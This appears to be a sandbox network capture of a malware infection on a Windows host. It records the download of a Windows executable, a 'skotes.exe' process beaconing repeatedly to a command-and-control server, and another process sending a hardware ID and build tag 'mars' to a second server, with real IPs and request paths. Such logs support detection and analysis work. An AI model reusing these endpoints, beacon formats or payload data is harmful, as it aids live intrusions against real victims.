Nov 10, 2024 04:57:01.144995928 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:01 GMT Content-Type: application/octet-stream Content-Length: 1769472 Last-Modified: Sun, 10 Nov 2024 03:45:33 GMT Connection: keep-alive ETag: "67302c5d-1b0000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 10 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 68 00 00 04 00 00 6d 38 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"h@@hm8@M$a$ $b@.rsrc $r@.idata $r@ )$t@vzzebkzrpNbv@ojovyeswh@.taggant0h"@
Nov 10, 2024 04:57:01.145029068 CET	212	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:57:01.145040035 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:57:01.145142078 CET	12	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:57:01.145153999 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:57:01.145164967 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 10, 2024 04:57:01.145176888 CET	1236	IN	Data Raw: ee b7 27 fa 48 bf e1 f3 f0 9e 7d 71 40 79 96 e6 fc 27 34 cf 60 9d 53 27 69 87 5f f0 67 97 bd cc 78 8f ec d7 70 87 74 d4 f6 8f e8 25 19 37 28 2c 60 85 12 0b 79 4b 7b 56 89 43 db 35 90 54 54 04 31 9b 43 a3 2e 1e 5c 23 90 92 4e d3 06 cb 41 ee 95 99 Data Ascii: 'H}q@y'4`S'i_gxpt%7(,`yK{VC5TT1C.\#NAwDb_\|3B_]`4Na xm0d?#8\[sn?C7wlIdG K.>%J4-(2Pu']0\r*wh#{Zd%,yj@])
Nov 10, 2024 04:57:01.145189047 CET	636	IN	Data Raw: 70 bc 2c 89 29 88 48 03 f5 33 b2 21 59 8d 88 22 1f 0a 37 65 37 c4 1b ac 6f 1c fb 2b cd bf 13 b8 f7 86 5e 6f 2b 5c 1e a8 17 9b 15 3c 64 95 87 a6 ec 6d 3f 26 e5 c4 60 f6 ec 54 a8 c0 2c fb 39 e1 38 c9 b7 53 fd 69 83 be 7c 4f 7d f5 3c 83 71 6d 05 4e Data Ascii: p,)H3!Y"7e7o+^o+\<dm?&`T,98Si\|O}<qmNL Kg)M$LWm~Fdi4Jh%,2/E#S<t]Jb8Yd[So2t &UPWwhj^"HsZK^;;6A@n&);DHo
Nov 10, 2024 04:57:01.145200968 CET	1236	IN	Data Raw: 5c 83 1a 8d 94 8b d4 2c 0d 67 72 ff e5 d4 30 bb 47 8b 10 26 52 ba b1 4e 3c 71 60 6c 0b 50 63 8c 82 b0 2d 6d fe 00 5c 3a c9 63 53 f3 2e 0b 37 96 23 01 d4 c4 43 61 a1 b0 62 82 eb 02 56 e3 8c 88 62 82 d1 0b 41 ab 82 e0 59 fc 0d f5 ff 73 40 71 50 0c Data Ascii: \,gr0G&RN<q`lPc-m\:cS.7#CabVbAYs@qP\O;nhMm`Uf$:_j\|0sYHYwF[x(+;S(1m$kp+y-]D.\|a'xh%k_b')$~LH\|f;1UQlF\|f0WjGT)
Nov 10, 2024 04:57:01.145210981 CET	212	IN	Data Raw: af c8 2d 3a b5 95 3a cd 70 cb b1 ab d1 d1 2d ec d6 51 98 d3 34 60 3f a0 72 19 50 19 28 e0 25 8d 70 0b bb f7 04 88 3b 37 09 e0 25 a1 70 07 0f 2a 17 91 16 35 e0 87 25 45 42 67 ad d7 20 a1 94 74 77 43 14 e1 e7 6b 59 23 83 1e ec b7 5e 5b 3a 1d 73 6b Data Ascii: -::p-Q4`?rP(%p;7%p5%EBg twCkY#^[:sk~o$h'LR/ak^oZd_^wjqx\`Ip_)2$Dr<%[d+cy'yBG+Y[$-Zcs%-y%
Nov 10, 2024 04:57:01.150079966 CET	1236	IN	Data Raw: 0c 7d 39 a1 32 9d 94 62 08 98 2b a9 04 1f 94 e2 83 c4 57 44 62 f3 2b 01 eb 07 0d d6 de b1 77 da 64 89 25 e1 19 88 02 d6 0e b1 59 da 48 95 93 f8 eb 42 98 64 04 2f 58 30 63 23 b2 2a cc 0f 26 25 62 08 28 67 64 f7 39 56 49 f0 ab d9 6f 80 42 19 ec 91 Data Ascii: }92b+WDb+wd%YHBd/X0c#*&%b(gd9VIoBAX8^B{1_V2s$Y0kB:xeb);_xOC]6'/c6o&rs8bdATGDpc]/}tpa,1BBq-d`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50237	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:02.739197969 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:57:03.588269949 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50248	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:05.173811913 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:57:06.086518049 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50254	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:07.818770885 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:57:08.710856915 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50255	185.215.113.206	80	7720	C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:08.004832029 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 10, 2024 04:57:09.075479031 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:57:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 10, 2024 04:57:09.078783035 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 32 36 31 30 37 38 41 37 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 2d 2d 0d 0a Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="hwid"B6261078A7D72284582127------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="build"mars------CGHCGIIDGDAKFIEBKFCF--
Nov 10, 2024 04:57:09.373964071 CET	210	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:57:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50257	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:10.239248991 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:57:11.166969061 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50258	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:12.807859898 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:57:13.707695961 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50259	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:15.311851025 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:57:16.226257086 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50261	185.215.113.206	80	5896	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:16.954031944 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 10, 2024 04:57:17.864331007 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:57:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 10, 2024 04:57:17.867393970 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIIIECBGDHJJKFIDAKJ Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 32 36 31 30 37 38 41 37 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 2d 2d 0d 0a Data Ascii: ------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="hwid"B6261078A7D72284582127------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="build"mars------EGIIIECBGDHJJKFIDAKJ--
Nov 10, 2024 04:57:18.150877953 CET	210	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:57:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50262	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:17.938292980 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:57:18.844906092 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50263	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:20.375196934 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:57:21.272612095 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50264	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:23.033919096 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:57:23.981281996 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50266	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:25.495282888 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:57:26.413321018 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	50268	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:28.127753973 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 10, 2024 04:57:29.014658928 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	50272	185.215.113.43	80	7264	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:30.582014084 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 10, 2024 04:57:31.487910032 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 10 Nov 2024 03:57:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.5	50273	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Nov 10, 2024 04:57:31.874511003 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 10, 2024 04:57:32.804444075 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:57:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 10, 2024 04:57:32.809585094 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDGIJECFIEBFIDHCGHD Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 32 36 31 30 37 38 41 37 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 2d 2d 0d 0a Data Ascii: ------KJDGIJECFIEBFIDHCGHDContent-Disposition: form-data; name="hwid"B6261078A7D72284582127------KJDGIJECFIEBFIDHCGHDContent-Disposition: form-data; name="build"mars------KJDGIJECFIEBFIDHCGHD--
